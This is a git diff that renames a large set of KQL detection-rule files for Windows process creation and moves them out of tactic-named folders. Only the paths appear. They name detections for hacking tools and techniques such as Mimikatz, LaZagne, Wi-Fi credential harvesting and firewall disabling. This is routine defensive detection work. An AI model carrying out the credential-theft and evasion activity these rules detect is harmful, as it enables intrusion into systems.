diff --git a/KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql b/KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
rename to KQL/rules/windows/process_creation/file_with_suspicious_extension_downloaded_via_bitsadmin.kql
diff --git a/KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql b/KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql
similarity index 100%
rename from KQL/rules/Collection/files_added_to_an_archive_using_rar_exe.kql
rename to KQL/rules/windows/process_creation/files_added_to_an_archive_using_rar_exe.kql
diff --git a/KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql b/KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/filter_driver_unloaded_via_fltmc_exe.kql
rename to KQL/rules/windows/process_creation/filter_driver_unloaded_via_fltmc_exe.kql
diff --git a/KQL/rules/Credential Access/findstr_gpp_passwords.kql b/KQL/rules/windows/process_creation/findstr_gpp_passwords.kql
similarity index 100%
rename from KQL/rules/Credential Access/findstr_gpp_passwords.kql
rename to KQL/rules/windows/process_creation/findstr_gpp_passwords.kql
diff --git a/KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql b/KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/findstr_launching_lnk_file.kql
rename to KQL/rules/windows/process_creation/findstr_launching_lnk_file.kql
diff --git a/KQL/rules/Command and Control/finger_exe_execution.kql b/KQL/rules/windows/process_creation/finger_exe_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/finger_exe_execution.kql
rename to KQL/rules/windows/process_creation/finger_exe_execution.kql
diff --git a/KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/firewall_configuration_discovery_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/firewall_configuration_discovery_via_netsh_exe.kql
diff --git a/KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/firewall_disabled_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/firewall_disabled_via_netsh_exe.kql
diff --git a/KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/firewall_rule_deleted_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/firewall_rule_deleted_via_netsh_exe.kql
diff --git a/KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql b/KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/firewall_rule_update_via_netsh_exe.kql
rename to KQL/rules/windows/process_creation/firewall_rule_update_via_netsh_exe.kql
diff --git a/KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql b/KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
similarity index 100%
rename from KQL/rules/Collection/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
rename to KQL/rules/windows/process_creation/folder_compress_to_potentially_suspicious_output_via_compress_archive_cmdlet.kql
diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/windows/process_creation/forfiles_command_execution.kql
similarity index 100%
rename from KQL/rules/Execution/forfiles_command_execution.kql
rename to KQL/rules/windows/process_creation/forfiles_command_execution.kql
diff --git a/KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql b/KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/forfiles_exe_child_process_masquerading.kql
rename to KQL/rules/windows/process_creation/forfiles_exe_child_process_masquerading.kql
diff --git a/KQL/rules/Discovery/fsutil_drive_enumeration.kql b/KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql
similarity index 100%
rename from KQL/rules/Discovery/fsutil_drive_enumeration.kql
rename to KQL/rules/windows/process_creation/fsutil_drive_enumeration.kql
diff --git a/KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql b/KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/fsutil_suspicious_invocation.kql
rename to KQL/rules/windows/process_creation/fsutil_suspicious_invocation.kql
diff --git a/KQL/rules/Discovery/gpresult_display_group_policy_information.kql b/KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql
similarity index 100%
rename from KQL/rules/Discovery/gpresult_display_group_policy_information.kql
rename to KQL/rules/windows/process_creation/gpresult_display_group_policy_information.kql
diff --git a/KQL/rules/Defense Evasion/gpscript_execution.kql b/KQL/rules/windows/process_creation/gpscript_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/gpscript_execution.kql
rename to KQL/rules/windows/process_creation/gpscript_execution.kql
diff --git a/KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql b/KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/greedy_file_deletion_using_del.kql
rename to KQL/rules/windows/process_creation/greedy_file_deletion_using_del.kql
diff --git a/KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql b/KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql
similarity index 100%
rename from KQL/rules/Discovery/group_membership_reconnaissance_via_whoami_exe.kql
rename to KQL/rules/windows/process_creation/group_membership_reconnaissance_via_whoami_exe.kql
diff --git a/KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql b/KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql
similarity index 100%
rename from KQL/rules/Command and Control/gzip_archive_decode_via_powershell.kql
rename to KQL/rules/windows/process_creation/gzip_archive_decode_via_powershell.kql
diff --git a/KQL/rules/Collection/hacktool_adcspwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql
similarity index 100%
rename from KQL/rules/Collection/hacktool_adcspwn_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_adcspwn_execution.kql
diff --git a/KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/hacktool_bloodhound_sharphound_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_bloodhound_sharphound_execution.kql
diff --git a/KQL/rules/Discovery/hacktool_certify_execution.kql b/KQL/rules/windows/process_creation/hacktool_certify_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/hacktool_certify_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_certify_execution.kql
diff --git a/KQL/rules/Discovery/hacktool_certipy_execution.kql b/KQL/rules/windows/process_creation/hacktool_certipy_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/hacktool_certipy_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_certipy_execution.kql
diff --git a/KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql b/KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_covenant_powershell_launcher.kql
rename to KQL/rules/windows/process_creation/hacktool_covenant_powershell_launcher.kql
diff --git a/KQL/rules/Execution/hacktool_crackmapexec_execution.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_crackmapexec_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_execution.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_crackmapexec_execution_patterns.kql
rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_execution_patterns.kql
diff --git a/KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_crackmapexec_powershell_obfuscation.kql
rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_powershell_obfuscation.kql
diff --git a/KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql b/KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_crackmapexec_process_patterns.kql
rename to KQL/rules/windows/process_creation/hacktool_crackmapexec_process_patterns.kql
diff --git a/KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql b/KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_default_powersploit_empire_scheduled_task_creation.kql
rename to KQL/rules/windows/process_creation/hacktool_default_powersploit_empire_scheduled_task_creation.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql b/KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_dinjector_powershell_cradle_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_dinjector_powershell_cradle_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql b/KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_dumpert_process_dumper_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_dumpert_process_dumper_execution.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql b/KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_edrsilencer_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_edrsilencer_execution.kql
diff --git a/KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_empire_powershell_launch_parameters.kql
rename to KQL/rules/windows/process_creation/hacktool_empire_powershell_launch_parameters.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql b/KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_empire_powershell_uac_bypass.kql
rename to KQL/rules/windows/process_creation/hacktool_empire_powershell_uac_bypass.kql
diff --git a/KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql b/KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_execution_pe_metadata.kql
rename to KQL/rules/windows/process_creation/hacktool_execution_pe_metadata.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql b/KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_f_secure_c3_load_by_rundll32.kql
rename to KQL/rules/windows/process_creation/hacktool_f_secure_c3_load_by_rundll32.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql b/KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_gmer_rootkit_detector_and_remover_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_gmer_rootkit_detector_and_remover_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql b/KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_hashcat_password_cracker_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_hashcat_password_cracker_execution.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql b/KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_hollowreaper_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_hollowreaper_execution.kql
diff --git a/KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql b/KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/hacktool_htran_natbypass_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_htran_natbypass_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql b/KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_hydra_password_bruteforce_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_hydra_password_bruteforce_execution.kql
diff --git a/KQL/rules/Collection/hacktool_impacket_tools_execution.kql b/KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql
similarity index 100%
rename from KQL/rules/Collection/hacktool_impacket_tools_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_impacket_tools_execution.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql b/KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_impersonate_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_impersonate_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_inveigh_execution.kql b/KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_inveigh_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_inveigh_execution.kql
diff --git a/KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql b/KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_jlaive_in_memory_assembly_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_jlaive_in_memory_assembly_execution.kql
diff --git a/KQL/rules/Execution/hacktool_koadic_execution.kql b/KQL/rules/windows/process_creation/hacktool_koadic_execution.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_koadic_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_koadic_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_krbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_krbrelay_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_krbrelay_execution.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql b/KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_krbrelayup_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_krbrelayup_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_lazagne_execution.kql b/KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_lazagne_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_lazagne_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_mimikatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_mimikatz_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_mimikatz_execution.kql
diff --git a/KQL/rules/Execution/hacktool_pchunter_execution.kql b/KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_pchunter_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_pchunter_execution.kql
diff --git a/KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql b/KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_potential_impacket_lateral_movement_activity.kql
rename to KQL/rules/windows/process_creation/hacktool_potential_impacket_lateral_movement_activity.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_powertool_execution.kql b/KQL/rules/windows/process_creation/hacktool_powertool_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_powertool_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_powertool_execution.kql
diff --git a/KQL/rules/Resource Development/hacktool_purplesharp_execution.kql b/KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql
similarity index 100%
rename from KQL/rules/Resource Development/hacktool_purplesharp_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_purplesharp_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql b/KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_pypykatz_credentials_dumping_activity.kql
rename to KQL/rules/windows/process_creation/hacktool_pypykatz_credentials_dumping_activity.kql
diff --git a/KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql b/KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_quarks_pwdump_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_quarks_pwdump_execution.kql
diff --git a/KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql b/KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_redmimicry_winnti_playbook_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_redmimicry_winnti_playbook_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql b/KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_remotekrbrelay_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_remotekrbrelay_execution.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql b/KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_rubeus_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_rubeus_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_safetykatz_execution.kql b/KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_safetykatz_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_safetykatz_execution.kql
diff --git a/KQL/rules/Credential Access/hacktool_securityxploded_execution.kql b/KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql
similarity index 100%
rename from KQL/rules/Credential Access/hacktool_securityxploded_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_securityxploded_execution.kql
diff --git a/KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/hacktool_sharpchisel_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpchisel_execution.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_sharpdpapi_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpdpapi_execution.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_sharpersist_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpersist_execution.kql
diff --git a/KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql
similarity index 100%
rename from KQL/rules/Defense Evasion/hacktool_sharpevtmute_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpevtmute_execution.kql
diff --git a/KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql
similarity index 100%
rename from KQL/rules/Privilege Escalation/hacktool_sharpimpersonation_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpimpersonation_execution.kql
diff --git a/KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/hacktool_sharpldapmonitor_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpldapmonitor_execution.kql
diff --git a/KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/hacktool_sharpldapwhoami_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpldapwhoami_execution.kql
diff --git a/KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql
similarity index 100%
rename from KQL/rules/Lateral Movement/hacktool_sharpmove_tool_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpmove_tool_execution.kql
diff --git a/KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql
similarity index 100%
rename from KQL/rules/Persistence/hacktool_sharpup_privesc_tool_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpup_privesc_tool_execution.kql
diff --git a/KQL/rules/Discovery/hacktool_sharpview_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql
similarity index 100%
rename from KQL/rules/Discovery/hacktool_sharpview_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpview_execution.kql
diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql
similarity index 100%
rename from KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_sharpwsus_wsuspendu_execution.kql
diff --git a/KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql b/KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql
similarity index 100%
rename from KQL/rules/Command and Control/hacktool_silenttrinity_stager_execution.kql
rename to KQL/rules/windows/process_creation/hacktool_silenttrinity_stager_execution.kql
diff --git a/KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql b/KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql similarity index 100% rename from KQL/rules/Execution/hacktool_sliver_c2_implant_activity_pattern.kql rename to KQL/rules/windows/process_creation/hacktool_sliver_c2_implant_activity_pattern.kql diff --git a/KQL/rules/Discovery/hacktool_soaphound_execution.kql b/KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_soaphound_execution.kql rename to KQL/rules/windows/process_creation/hacktool_soaphound_execution.kql diff --git a/KQL/rules/Execution/hacktool_stracciatella_execution.kql b/KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql similarity index 100% rename from KQL/rules/Execution/hacktool_stracciatella_execution.kql rename to KQL/rules/windows/process_creation/hacktool_stracciatella_execution.kql diff --git a/KQL/rules/Discovery/hacktool_trufflesnout_execution.kql b/KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql similarity index 100% rename from KQL/rules/Discovery/hacktool_trufflesnout_execution.kql rename to KQL/rules/windows/process_creation/hacktool_trufflesnout_execution.kql diff --git a/KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hacktool_winpeas_execution.kql rename to KQL/rules/windows/process_creation/hacktool_winpeas_execution.kql diff --git a/KQL/rules/Credential Access/hacktool_winpwn_execution.kql b/KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql similarity index 100% rename from KQL/rules/Credential Access/hacktool_winpwn_execution.kql rename to KQL/rules/windows/process_creation/hacktool_winpwn_execution.kql 
diff --git a/KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql b/KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql similarity index 100% rename from KQL/rules/Lateral Movement/hacktool_winrm_access_via_evil_winrm.kql rename to KQL/rules/windows/process_creation/hacktool_winrm_access_via_evil_winrm.kql diff --git a/KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql b/KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_wmiexec_default_powershell_command.kql rename to KQL/rules/windows/process_creation/hacktool_wmiexec_default_powershell_command.kql diff --git a/KQL/rules/Defense Evasion/hacktool_xordump_execution.kql b/KQL/rules/windows/process_creation/hacktool_xordump_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hacktool_xordump_execution.kql rename to KQL/rules/windows/process_creation/hacktool_xordump_execution.kql diff --git a/KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Execution/hardware_model_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/hardware_model_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql b/KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql similarity index 100% rename from KQL/rules/Discovery/harvesting_of_wifi_credentials_via_netsh_exe.kql rename to KQL/rules/windows/process_creation/harvesting_of_wifi_credentials_via_netsh_exe.kql 
diff --git a/KQL/rules/Defense Evasion/hh_exe_execution.kql b/KQL/rules/windows/process_creation/hh_exe_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/hh_exe_execution.kql rename to KQL/rules/windows/process_creation/hh_exe_execution.kql diff --git a/KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql b/KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql similarity index 100% rename from KQL/rules/Execution/hidden_powershell_in_link_file_pattern.kql rename to KQL/rules/windows/process_creation/hidden_powershell_in_link_file_pattern.kql diff --git a/KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql b/KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/hiding_files_with_attrib_exe.kql rename to KQL/rules/windows/process_creation/hiding_files_with_attrib_exe.kql diff --git a/KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql b/KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/hiding_user_account_via_specialaccounts_registry_key_commandline.kql rename to KQL/rules/windows/process_creation/hiding_user_account_via_specialaccounts_registry_key_commandline.kql diff --git a/KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql b/KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql similarity index 100% rename from KQL/rules/Privilege Escalation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql rename to KQL/rules/windows/process_creation/hktl_sharpsuccessor_privilege_escalation_tool_execution.kql 
diff --git a/KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql b/KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Defense Evasion/html_help_hh_exe_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/html_help_hh_exe_suspicious_child_process.kql diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql similarity index 100% rename from KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql rename to KQL/rules/windows/process_creation/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql diff --git a/KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql b/KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql similarity index 100% rename from KQL/rules/Persistence/iis_native_code_module_command_line_installation.kql rename to KQL/rules/windows/process_creation/iis_native_code_module_command_line_installation.kql diff --git a/KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql b/KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql similarity index 100% rename from KQL/rules/Defense Evasion/iis_webserver_log_deletion_via_commandline_utilities.kql rename to KQL/rules/windows/process_creation/iis_webserver_log_deletion_via_commandline_utilities.kql 
